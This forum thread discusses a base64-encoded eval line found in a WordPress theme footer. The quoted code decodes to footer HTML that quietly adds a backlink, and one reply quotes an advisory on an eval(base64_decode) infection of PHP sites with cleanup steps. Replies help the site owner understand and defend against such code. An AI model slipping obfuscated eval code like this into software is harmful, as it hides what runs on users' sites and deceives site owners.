1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Can someone tell my what this is

Discussion in 'General Programming Chat' started by mindmaster, Feb 21, 2011.

  1. mindmaster

    mindmaster Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2010
    Messages:
    2,501
    Likes Received:
    1,135
    Location:
    at my new office
    PHP:
    <?php eval(base64_decode('Pz4gPGRpdiBpZD0iZm9vdGVyIj48ZGl2IGNsYXNzPSJjb3B5cmlnaHQiPkNvcHlyaWdodCAmY29weTsgPD9waHAgZWNobyBkYXRlKCdZJyk7Pz4gPD9waHAgYmxvZ2luZm8oJ25hbWUnKTsgPz4gIDw/cGhwIGlmKGlzX2hvbWUoKSkgOiA/PjxhIGhyZWY9Imh0dHA6Ly9mci5lbWFpbC11bmxpbWl0ZWQuY29tLyIgdGl0bGU9IkVtYWlsaW5nIj5FbWFpbGluZzwvYT48P3BocCBlbmRpZjsgPz48L2Rpdj4NCjxkaXYgY2xhc3M9InN1YnNjcmliZS1yc3MiPg0KPHNwYW4gY2xhc3M9InhodG1sIj4gPGEgaHJlZj0iaHR0cDovL3ZhbGlkYXRvci53My5vcmcvY2hlY2svcmVmZXJlciIgdGl0bGU9IlRoaXMgcGFnZSB2YWxpZGF0ZXMgYXMgWEhUTUwgMS4wIFRyYW5zaXRpb25hbCI+WEhUTUw8L2E+PC9zcGFuPg0KDQo8c3BhbiBjbGFzcz0iY3NzIj48YSBocmVmPSJodHRwOi8vamlnc2F3LnczLm9yZy9jc3MtdmFsaWRhdG9yL3ZhbGlkYXRvcj91cmk9PD9waHAgYmxvZ2luZm8oJ3VybCcpOyA/PiZhbXA7dXNlcm1lZGl1bT1hbGwiIHRpdGxlPSJUaGlzIGRvY3VtZW50IHZhbGlkYXRlcyBhcyBDU1MgbGV2ZWwgMi4xIj5DU1M8L2E+PC9zcGFuPg0KDQo8c3BhbiBjbGFzcz0ibG9naW5vdXQiPjw/cGhwIHdwX2xvZ2lub3V0KCk7ID8+PC9zcGFuPjwvZGl2Pg0KPGRpdiBpZD0iY3JlZGl0cyI+IDwvZGl2Pg0KDQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjw/cGhwIHdwX2Zvb3RlcigpOyA/Pg0KPC9ib2R5Pg0KPC9odG1sPg0KDQoNCg0KIDw/'));?>
    What the heck is this in my theme?

    Thanks
     
  2. blogdev

    blogdev BANNED BANNED

    Joined:
    Sep 29, 2009
    Messages:
    128
    Likes Received:
    101
    base64 :D
     
  3. CoyoteAssassin

    CoyoteAssassin Elite Member

    Joined:
    Jan 3, 2010
    Messages:
    1,862
    Likes Received:
    3,906
    Occupation:
    Full Time IMer
    Location:
    USA
    According to this site, you have been hacked. What software and did you get it from here?

    Code:
    http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/
    val(base64_decode hack going around the internet,

    If your cart "suddenly" stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.
    Some of the more common signs of this are
    * Category images stop displaying
    * FCK editor refuses to display images folder
    * Payment modules stop working
    * Checkout process stops working

    How will you know?
    Open any PHP file on your server, if at the very top you see a line like
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
    Then you have been hacked.

    To clean your site you have two options,
    1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)
    And restore from a good back up. This is the best and easy route.

    2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

    This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

    Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

    When this has been done it will be good practice to "drop" your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I've not come across this yet, but have heard it happens.

    Now your site is free on the code, you need to prevent it from happening again.

    How to prevent infection.

    This is not guaranteed 100% proof but it is going to help stop re-infection.

    Change the name of your admin folder to something less obvious.
    Delete admin/filemanager.php and associated links.
    Ensure that your folder permissions are never set higher than 755
    Install some security addons,
    Also some ideas from this post can help you,
    If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.
    There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here.
     
    • Thanks Thanks x 1
  4. blogdev

    blogdev BANNED BANNED

    Joined:
    Sep 29, 2009
    Messages:
    128
    Likes Received:
    101
    Actually you are using a WP theme and most of the footer.php are code...

    here's your footer.php

    <?php
    ?><?php wp_footer(); ?>
    <div class="center-widget-title"></div>
    <div class="center-widget">

    <div class="footer">
    <p>Copyright © <a href="<?php echo get_settings('home'); ?>">
    <?php bloginfo('name'); ?>
    </div> <!-- footer -->
    </div> <!-- Center Widget -->
    </div> <!-- page -->
    </body>
    </html><?php
    ?>
     
    • Thanks Thanks x 1
    Last edited: Feb 21, 2011
  5. inaga

    inaga Newbie

    Joined:
    Feb 4, 2010
    Messages:
    12
    Likes Received:
    3
    eval(); executes script/code, the string is base64 encoded. when decoded it doesnt seem to be anything malicious, and as said before it looks to be the footer of your theme. just to clarify once more for you.
     
    • Thanks Thanks x 1
  6. mindmaster

    mindmaster Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2010
    Messages:
    2,501
    Likes Received:
    1,135
    Location:
    at my new office
    It is from the footer, but it scared the hell out of my.

    Thankfully this not apear. I opened few php file from my ftp.

    So it is safe you say.

    Thanks
     
  7. blakamia

    blakamia Junior Member

    Joined:
    Jan 25, 2010
    Messages:
    162
    Likes Received:
    343
    This is a trick in free themes where they insert their link into your footer. That way the theme author gets link which many people do not notice. It's popular in many high competition niches. Check out top 'auto insurance' (iirc) sites backlinks sometimes.